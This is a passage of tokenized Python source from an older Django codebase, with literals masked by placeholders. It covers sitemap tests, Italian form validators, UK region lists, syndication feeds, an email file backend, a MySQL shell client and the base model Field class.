<NUM_LIT:0> ] <EOL> geo_format = geo_elem . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( kml_type , geo_format . childNodes [ <NUM_LIT:0> ] . data ) <EOL> kml_url = url . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] . childNodes [ <NUM_LIT:0> ] . data . split ( '<STR_LIT>' ) [ <NUM_LIT:1> ] <EOL> if kml_type == '<STR_LIT>' : <EOL> kml_doc = minidom . parseString ( self . client . get ( kml_url ) . content ) <EOL> elif kml_type == '<STR_LIT>' : <EOL> buf = cStringIO . StringIO ( self . client . get ( kml_url ) . content ) <EOL> zf = zipfile . ZipFile ( buf ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( zf . filelist ) ) <EOL> self . assertEqual ( '<STR_LIT>' , zf . filelist [ <NUM_LIT:0> ] . filename ) <EOL> kml_doc = minidom . parseString ( zf . read ( '<STR_LIT>' ) ) <EOL> if '<STR_LIT>' in kml_url : <EOL> model = City <EOL> elif '<STR_LIT>' in kml_url : <EOL> model = Country <EOL> self . assertEqual ( model . objects . count ( ) , len ( kml_doc . getElementsByTagName ( '<STR_LIT>' ) ) ) <EOL> def test_geositemap_georss ( self ) : <EOL> "<STR_LIT>" <EOL> from feeds import feed_dict <EOL> doc = minidom . parseString ( self . client . get ( '<STR_LIT>' ) . content ) <EOL> urlset = doc . firstChild <EOL> self . assertEqual ( urlset . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> self . assertEqual ( urlset . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> urls = urlset . getElementsByTagName ( '<STR_LIT:url>' ) <EOL> self . assertEqual ( len ( feed_dict ) , len ( urls ) ) <EOL> for url in urls : <EOL> self . assertChildNodes ( url , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> geo_elem = url . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> geo_format = geo_elem . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , geo_format . childNodes [ <NUM_LIT:0> ] . data ) </s>
<s> """<STR_LIT>""" <EOL> from django . core . validators import EMPTY_VALUES <EOL> from django . forms import ValidationError <EOL> from django . forms . fields import Field , RegexField , Select <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils . encoding import smart_unicode <EOL> from django . contrib . localflavor . it . util import ssn_check_digit , vat_number_check_digit <EOL> import re <EOL> class ITZipCodeField ( RegexField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ITZipCodeField , self ) . __init__ ( r'<STR_LIT>' , <EOL> max_length = None , min_length = None , * args , ** kwargs ) <EOL> class ITRegionSelect ( Select ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None ) : <EOL> from it_region import REGION_CHOICES <EOL> super ( ITRegionSelect , self ) . __init__ ( attrs , choices = REGION_CHOICES ) <EOL> class ITProvinceSelect ( Select ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None ) : <EOL> from it_province import PROVINCE_CHOICES <EOL> super ( ITProvinceSelect , self ) . __init__ ( attrs , choices = PROVINCE_CHOICES ) <EOL> class ITSocialSecurityNumberField ( RegexField ) : <EOL> """<STR_LIT>""" <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ITSocialSecurityNumberField , self ) . __init__ ( r'<STR_LIT>' , <EOL> max_length = None , min_length = None , * args , ** kwargs ) <EOL> def clean ( self , value ) : <EOL> value = super ( ITSocialSecurityNumberField , self ) . clean ( value ) <EOL> if value in EMPTY_VALUES : <EOL> return u'<STR_LIT>' <EOL> value = re . sub ( '<STR_LIT>' , u'<STR_LIT>' , value ) . upper ( ) <EOL> try : <EOL> check_digit = ssn_check_digit ( value ) <EOL> except ValueError : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> if not value [ <NUM_LIT:15> ] == check_digit : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return value <EOL> class ITVatNumberField ( Field ) : <EOL> """<STR_LIT>""" <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def clean ( self , value ) : <EOL> value = super ( ITVatNumberField , self ) . clean ( value ) <EOL> if value in EMPTY_VALUES : <EOL> return u'<STR_LIT>' <EOL> try : <EOL> vat_number = int ( value ) <EOL> except ValueError : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> vat_number = str ( vat_number ) . zfill ( <NUM_LIT:11> ) <EOL> check_digit = vat_number_check_digit ( vat_number [ <NUM_LIT:0> : <NUM_LIT:10> ] ) <EOL> if not vat_number [ <NUM_LIT:10> ] == check_digit : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return smart_unicode ( vat_number ) </s>
<s> """<STR_LIT>""" <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> ENGLAND_REGION_CHOICES = ( <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ) <EOL> NORTHERN_IRELAND_REGION_CHOICES = ( <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ) <EOL> WALES_REGION_CHOICES = ( <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ) <EOL> SCOTTISH_REGION_CHOICES = ( <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ) <EOL> UK_NATIONS_CHOICES = ( <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ) <EOL> UK_REGION_CHOICES = ENGLAND_REGION_CHOICES + NORTHERN_IRELAND_REGION_CHOICES + WALES_REGION_CHOICES + SCOTTISH_REGION_CHOICES </s>
<s> from django . contrib . messages . tests . base import BaseTest <EOL> from django . contrib . messages . storage . session import SessionStorage <EOL> def set_session_data ( storage , messages ) : <EOL> """<STR_LIT>""" <EOL> storage . request . session [ storage . session_key ] = messages <EOL> if hasattr ( storage , '<STR_LIT>' ) : <EOL> del storage . _loaded_data <EOL> def stored_session_messages_count ( storage ) : <EOL> data = storage . request . session . get ( storage . session_key , [ ] ) <EOL> return len ( data ) <EOL> class SessionTest ( BaseTest ) : <EOL> storage_class = SessionStorage <EOL> def get_request ( self ) : <EOL> self . session = { } <EOL> request = super ( SessionTest , self ) . get_request ( ) <EOL> request . session = self . session <EOL> return request <EOL> def stored_messages_count ( self , storage , response ) : <EOL> return stored_session_messages_count ( storage ) <EOL> def test_get ( self ) : <EOL> storage = self . storage_class ( self . get_request ( ) ) <EOL> example_messages = [ '<STR_LIT:test>' , '<STR_LIT>' ] <EOL> set_session_data ( storage , example_messages ) <EOL> self . assertEqual ( list ( storage ) , example_messages ) </s>
<s> import datetime <EOL> from django . conf import settings <EOL> from django . contrib . sites . models import get_current_site <EOL> from django . core . exceptions import ImproperlyConfigured , ObjectDoesNotExist <EOL> from django . http import HttpResponse , Http404 <EOL> from django . template import loader , Template , TemplateDoesNotExist , RequestContext <EOL> from django . utils import feedgenerator , tzinfo <EOL> from django . utils . encoding import force_unicode , iri_to_uri , smart_unicode <EOL> from django . utils . html import escape <EOL> def add_domain ( domain , url , secure = False ) : <EOL> if not ( url . startswith ( '<STR_LIT>' ) <EOL> or url . startswith ( '<STR_LIT>' ) <EOL> or url . startswith ( '<STR_LIT>' ) ) : <EOL> if secure : <EOL> protocol = '<STR_LIT>' <EOL> else : <EOL> protocol = '<STR_LIT:http>' <EOL> url = iri_to_uri ( u'<STR_LIT>' % ( protocol , domain , url ) ) <EOL> return url <EOL> class FeedDoesNotExist ( ObjectDoesNotExist ) : <EOL> pass <EOL> class Feed ( object ) : <EOL> feed_type = feedgenerator . DefaultFeed <EOL> title_template = None <EOL> description_template = None <EOL> def __call__ ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> obj = self . get_object ( request , * args , ** kwargs ) <EOL> except ObjectDoesNotExist : <EOL> raise Http404 ( '<STR_LIT>' ) <EOL> feedgen = self . get_feed ( obj , request ) <EOL> response = HttpResponse ( mimetype = feedgen . mime_type ) <EOL> feedgen . write ( response , '<STR_LIT:utf-8>' ) <EOL> return response <EOL> def item_title ( self , item ) : <EOL> return escape ( force_unicode ( item ) ) <EOL> def item_description ( self , item ) : <EOL> return force_unicode ( item ) <EOL> def item_link ( self , item ) : <EOL> try : <EOL> return item . get_absolute_url ( ) <EOL> except AttributeError : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' % item . __class__ . __name__ ) <EOL> def __get_dynamic_attr ( self , attname , obj , default = None ) : <EOL> try : <EOL> attr = getattr ( self , attname ) <EOL> except AttributeError : <EOL> return default <EOL> if callable ( attr ) : <EOL> if hasattr ( attr , '<STR_LIT>' ) : <EOL> argcount = attr . func_code . co_argcount <EOL> else : <EOL> argcount = attr . __call__ . func_code . co_argcount <EOL> if argcount == <NUM_LIT:2> : <EOL> return attr ( obj ) <EOL> else : <EOL> return attr ( ) <EOL> return attr <EOL> def feed_extra_kwargs ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def item_extra_kwargs ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def get_object ( self , request , * args , ** kwargs ) : <EOL> return None <EOL> def get_feed ( self , obj , request ) : <EOL> """<STR_LIT>""" <EOL> current_site = get_current_site ( request ) <EOL> link = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) <EOL> link = add_domain ( current_site . domain , link , request . is_secure ( ) ) <EOL> feed = self . feed_type ( <EOL> title = self . __get_dynamic_attr ( '<STR_LIT:title>' , obj ) , <EOL> subtitle = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> link = link , <EOL> description = self . __get_dynamic_attr ( '<STR_LIT:description>' , obj ) , <EOL> language = settings . LANGUAGE_CODE . decode ( ) , <EOL> feed_url = add_domain ( <EOL> current_site . domain , <EOL> self . __get_dynamic_attr ( '<STR_LIT>' , obj ) or request . path , <EOL> request . is_secure ( ) , <EOL> ) , <EOL> author_name = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> author_link = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> author_email = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> categories = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> feed_copyright = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> feed_guid = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> ttl = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> ** self . feed_extra_kwargs ( obj ) <EOL> ) <EOL> title_tmp = None <EOL> if self . title_template is not None : <EOL> try : <EOL> title_tmp = loader . get_template ( self . title_template ) <EOL> except TemplateDoesNotExist : <EOL> pass <EOL> description_tmp = None <EOL> if self . description_template is not None : <EOL> try : <EOL> description_tmp = loader . get_template ( self . description_template ) <EOL> except TemplateDoesNotExist : <EOL> pass <EOL> for item in self . __get_dynamic_attr ( '<STR_LIT>' , obj ) : <EOL> if title_tmp is not None : <EOL> title = title_tmp . render ( RequestContext ( request , { '<STR_LIT>' : item , '<STR_LIT>' : current_site } ) ) <EOL> else : <EOL> title = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> if description_tmp is not None : <EOL> description = description_tmp . render ( RequestContext ( request , { '<STR_LIT>' : item , '<STR_LIT>' : current_site } ) ) <EOL> else : <EOL> description = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> link = add_domain ( <EOL> current_site . domain , <EOL> self . __get_dynamic_attr ( '<STR_LIT>' , item ) , <EOL> request . is_secure ( ) , <EOL> ) <EOL> enc = None <EOL> enc_url = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> if enc_url : <EOL> enc = feedgenerator . Enclosure ( <EOL> url = smart_unicode ( enc_url ) , <EOL> length = smart_unicode ( self . __get_dynamic_attr ( '<STR_LIT>' , item ) ) , <EOL> mime_type = smart_unicode ( self . __get_dynamic_attr ( '<STR_LIT>' , item ) ) <EOL> ) <EOL> author_name = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> if author_name is not None : <EOL> author_email = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> author_link = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> else : <EOL> author_email = author_link = None <EOL> pubdate = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> if pubdate and not pubdate . tzinfo : <EOL> ltz = tzinfo . LocalTimezone ( pubdate ) <EOL> pubdate = pubdate . replace ( tzinfo = ltz ) <EOL> feed . add_item ( <EOL> title = title , <EOL> link = link , <EOL> description = description , <EOL> unique_id = self . __get_dynamic_attr ( '<STR_LIT>' , item , link ) , <EOL> enclosure = enc , <EOL> pubdate = pubdate , <EOL> author_name = author_name , <EOL> author_email = author_email , <EOL> author_link = author_link , <EOL> categories = self . __get_dynamic_attr ( '<STR_LIT>' , item ) , <EOL> item_copyright = self . __get_dynamic_attr ( '<STR_LIT>' , item ) , <EOL> ** self . item_extra_kwargs ( item ) <EOL> ) <EOL> return feed <EOL> def feed ( request , url , feed_dict = None ) : <EOL> """<STR_LIT>""" <EOL> from django . contrib . syndication . feeds import Feed as LegacyFeed <EOL> import warnings <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> category = PendingDeprecationWarning ) <EOL> if not feed_dict : <EOL> raise Http404 ( "<STR_LIT>" ) <EOL> try : <EOL> slug , param = url . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> slug , param = url , '<STR_LIT>' <EOL> try : <EOL> f = feed_dict [ slug ] <EOL> except KeyError : <EOL> raise Http404 ( "<STR_LIT>" % slug ) <EOL> if not issubclass ( f , LegacyFeed ) : <EOL> instance = f ( ) <EOL> instance . feed_url = getattr ( f , '<STR_LIT>' , None ) or request . path <EOL> instance . title_template = f . title_template or ( '<STR_LIT>' % slug ) <EOL> instance . description_template = f . description_template or ( '<STR_LIT>' % slug ) <EOL> return instance ( request ) <EOL> try : <EOL> feedgen = f ( slug , request ) . get_feed ( param ) <EOL> except FeedDoesNotExist : <EOL> raise Http404 ( "<STR_LIT>" % slug ) <EOL> response = HttpResponse ( mimetype = feedgen . mime_type ) <EOL> feedgen . write ( response , '<STR_LIT:utf-8>' ) <EOL> return response </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> import os <EOL> from django . conf import settings <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . core . mail . backends . console import EmailBackend as ConsoleEmailBackend <EOL> class EmailBackend ( ConsoleEmailBackend ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . _fname = None <EOL> if '<STR_LIT>' in kwargs : <EOL> self . file_path = kwargs . pop ( '<STR_LIT>' ) <EOL> else : <EOL> self . file_path = getattr ( settings , '<STR_LIT>' , None ) <EOL> if not isinstance ( self . file_path , basestring ) : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' % self . file_path ) <EOL> self . file_path = os . path . abspath ( self . file_path ) <EOL> if os . path . exists ( self . file_path ) and not os . path . isdir ( self . file_path ) : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' % self . file_path ) <EOL> elif not os . path . exists ( self . file_path ) : <EOL> try : <EOL> os . makedirs ( self . file_path ) <EOL> except OSError , err : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' % ( self . file_path , err ) ) <EOL> if not os . access ( self . file_path , os . W_OK ) : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' % self . file_path ) <EOL> kwargs [ '<STR_LIT>' ] = None <EOL> super ( EmailBackend , self ) . __init__ ( * args , ** kwargs ) <EOL> def _get_filename ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _fname is None : <EOL> timestamp = datetime . datetime . now ( ) . strftime ( "<STR_LIT>" ) <EOL> fname = "<STR_LIT>" % ( timestamp , abs ( id ( self ) ) ) <EOL> self . _fname = os . path . join ( self . file_path , fname ) <EOL> return self . _fname <EOL> def open ( self ) : <EOL> if self . stream is None : <EOL> self . stream = open ( self . _get_filename ( ) , '<STR_LIT:a>' ) <EOL> return True <EOL> return False <EOL> def close ( self ) : <EOL> try : <EOL> if self . stream is not None : <EOL> self . stream . close ( ) <EOL> finally : <EOL> self . stream = None </s>
<s> from django . core . management . base import AppCommand , CommandError <EOL> class Command ( AppCommand ) : <EOL> help = "<STR_LIT>" <EOL> def handle ( self , * apps , ** options ) : <EOL> raise CommandError ( "<STR_LIT>" ) </s>
<s> import os <EOL> import sys <EOL> from django . db . backends import BaseDatabaseClient <EOL> class DatabaseClient ( BaseDatabaseClient ) : <EOL> executable_name = '<STR_LIT>' <EOL> def runshell ( self ) : <EOL> settings_dict = self . connection . settings_dict <EOL> args = [ self . executable_name ] <EOL> db = settings_dict [ '<STR_LIT>' ] . get ( '<STR_LIT>' , settings_dict [ '<STR_LIT>' ] ) <EOL> user = settings_dict [ '<STR_LIT>' ] . get ( '<STR_LIT:user>' , settings_dict [ '<STR_LIT>' ] ) <EOL> passwd = settings_dict [ '<STR_LIT>' ] . get ( '<STR_LIT>' , settings_dict [ '<STR_LIT>' ] ) <EOL> host = settings_dict [ '<STR_LIT>' ] . get ( '<STR_LIT:host>' , settings_dict [ '<STR_LIT>' ] ) <EOL> port = settings_dict [ '<STR_LIT>' ] . get ( '<STR_LIT:port>' , settings_dict [ '<STR_LIT>' ] ) <EOL> defaults_file = settings_dict [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) <EOL> if defaults_file : <EOL> args += [ "<STR_LIT>" % defaults_file ] <EOL> if user : <EOL> args += [ "<STR_LIT>" % user ] <EOL> if passwd : <EOL> args += [ "<STR_LIT>" % passwd ] <EOL> if host : <EOL> if '<STR_LIT:/>' in host : <EOL> args += [ "<STR_LIT>" % host ] <EOL> else : <EOL> args += [ "<STR_LIT>" % host ] <EOL> if port : <EOL> args += [ "<STR_LIT>" % port ] <EOL> if db : <EOL> args += [ db ] <EOL> if os . name == '<STR_LIT>' : <EOL> sys . exit ( os . system ( "<STR_LIT:U+0020>" . join ( args ) ) ) <EOL> else : <EOL> os . execvp ( self . executable_name , args ) </s>
<s> import datetime <EOL> import decimal <EOL> import re <EOL> import time <EOL> import math <EOL> from itertools import tee <EOL> import django . utils . copycompat as copy <EOL> from django . db import connection <EOL> from django . db . models . fields . subclassing import LegacyConnection <EOL> from django . db . models . query_utils import QueryWrapper <EOL> from django . conf import settings <EOL> from django import forms <EOL> from django . core import exceptions , validators <EOL> from django . utils . datastructures import DictWrapper <EOL> from django . utils . functional import curry <EOL> from django . utils . text import capfirst <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils . encoding import smart_unicode , force_unicode , smart_str <EOL> from django . utils import datetime_safe <EOL> class NOT_PROVIDED : <EOL> pass <EOL> BLANK_CHOICE_DASH = [ ( "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> BLANK_CHOICE_NONE = [ ( "<STR_LIT>" , "<STR_LIT:None>" ) ] <EOL> class FieldDoesNotExist ( Exception ) : <EOL> pass <EOL> class Field ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = LegacyConnection <EOL> empty_strings_allowed = True <EOL> creation_counter = <NUM_LIT:0> <EOL> auto_creation_counter = - <NUM_LIT:1> <EOL> default_validators = [ ] <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT:null>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT:blank>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def _description ( self ) : <EOL> return _ ( u'<STR_LIT>' ) % { <EOL> '<STR_LIT>' : self . __class__ . __name__ <EOL> } <EOL> description = property ( _description ) <EOL> def __init__ ( self , verbose_name = None , name = None , primary_key = False , <EOL> max_length = None , unique = False , blank = False , null = False , <EOL> db_index = False , rel = None , default = NOT_PROVIDED , editable = True , <EOL> serialize = True , unique_for_date = None , unique_for_month = None , <EOL> unique_for_year = None , choices = None , help_text = '<STR_LIT>' , db_column = None , <EOL> db_tablespace = None , auto_created = False , validators = [ ] , <EOL> error_messages = None ) : <EOL> self . name = name <EOL> self . verbose_name = verbose_name <EOL> self . primary_key = primary_key <EOL> self . max_length , self . _unique = max_length , unique <EOL> self . blank , self . null = blank , null <EOL> if self . empty_strings_allowed and connection . features . interprets_empty_strings_as_nulls : <EOL> self . null = True <EOL> self . rel = rel <EOL> self . default = default <EOL> self . editable = editable <EOL> self . serialize = serialize <EOL> self . unique_for_date , self . unique_for_month = unique_for_date , unique_for_month <EOL> self . unique_for_year = unique_for_year <EOL> self . _choices = choices or [ ] <EOL> self . help_text = help_text <EOL> self . db_column = db_column <EOL> self . db_tablespace = db_tablespace or settings . DEFAULT_INDEX_TABLESPACE <EOL> self . auto_created = auto_created <EOL> self . db_index = db_index <EOL> if auto_created : <EOL> self . creation_counter = Field . auto_creation_counter <EOL> Field . auto_creation_counter -= <NUM_LIT:1> <EOL> else : <EOL> self . creation_counter = Field . creation_counter <EOL> Field . creation_counter += <NUM_LIT:1> <EOL> self . validators = self . default_validators + validators <EOL> messages = { } <EOL> for c in reversed ( self . __class__ . __mro__ ) : <EOL> messages . update ( getattr ( c , '<STR_LIT>' , { } ) ) <EOL> messages . update ( error_messages or { } ) <EOL> self . error_messages = messages <EOL> def __cmp__ ( self , other ) : <EOL> return cmp ( self . creation_counter , other . creation_counter ) <EOL> def __deepcopy__ ( self , memodict ) : <EOL> obj = copy . copy ( self ) <EOL> if self . rel : <EOL> obj . rel = copy . copy ( self . rel ) <EOL> memodict [ id ( self ) ] = obj <EOL> return obj <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> return value <EOL> def run_validators ( self , value ) : <EOL> if value in validators . EMPTY_VALUES : <EOL> return <EOL> errors = [ ] <EOL> for v in self . validators : <EOL> try : <EOL> v ( value ) <EOL> except exceptions . ValidationError , e : <EOL> if hasattr ( e , '<STR_LIT:code>' ) and e . code in self . error_messages : <EOL> message = self . error_messages [ e . code ] <EOL> if e . params : <EOL> message = message % e . params <EOL> errors . append ( message ) <EOL> else : <EOL> errors . extend ( e . messages ) <EOL> if errors : <EOL> raise exceptions . ValidationError ( errors ) <EOL> def validate ( self , value , model_instance ) : <EOL> """<STR_LIT>""" <EOL> if not self . editable : <EOL> return <EOL> if self . _choices and value : <EOL> for option_key , option_value in self . choices : <EOL> if isinstance ( option_value , ( list , tuple ) ) : <EOL> for optgroup_key , optgroup_value in option_value : <EOL> if value == optgroup_key : <EOL> return <EOL> elif value == option_key : <EOL> return <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] % value ) <EOL> if value is None and not self . null : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT:null>' ] ) <EOL> if not self . blank and value in validators . EMPTY_VALUES : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT:blank>' ] ) <EOL> def clean ( self , value , model_instance ) : <EOL> """<STR_LIT>""" <EOL> value = self . to_python ( value ) <EOL> self . validate ( value , model_instance ) <EOL> self . run_validators ( value ) <EOL> return value <EOL> def db_type ( self , connection ) : <EOL> """<STR_LIT>""" <EOL> data = DictWrapper ( self . __dict__ , connection . ops . quote_name , "<STR_LIT>" ) <EOL> try : <EOL> return connection . creation . data_types [ self . get_internal_type ( ) ] % data <EOL> except KeyError : <EOL> return None <EOL> def unique ( self ) : <EOL> return self . _unique or self . primary_key <EOL> unique = property ( unique ) <EOL> def set_attributes_from_name ( self , name ) : <EOL> self . name = name <EOL> self . attname , self . column = self . get_attname_column ( ) <EOL> if self . verbose_name is None and name : <EOL> self . verbose_name = name . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) <EOL> def contribute_to_class ( self , cls , name ) : <EOL> self . set_attributes_from_name ( name ) <EOL> self . model = cls <EOL> cls . _meta . add_field ( self ) <EOL> if self . choices : <EOL> setattr ( cls , '<STR_LIT>' % self . name , curry ( cls . _get_FIELD_display , field = self ) ) <EOL> def get_attname ( self ) : <EOL> return self . name <EOL> def get_attname_column ( self ) : <EOL> attname = self . get_attname ( ) <EOL> column = self . db_column or attname <EOL> return attname , column <EOL> def get_cache_name ( self ) : <EOL> return '<STR_LIT>' % self . name <EOL> def get_internal_type ( self ) : <EOL> return self . __class__ . __name__ <EOL> def pre_save ( self , model_instance , add ) : <EOL> "<STR_LIT>" <EOL> return getattr ( model_instance , self . attname ) <EOL> def get_prep_value ( self , value ) : <EOL> "<STR_LIT>" <EOL> return value <EOL> def 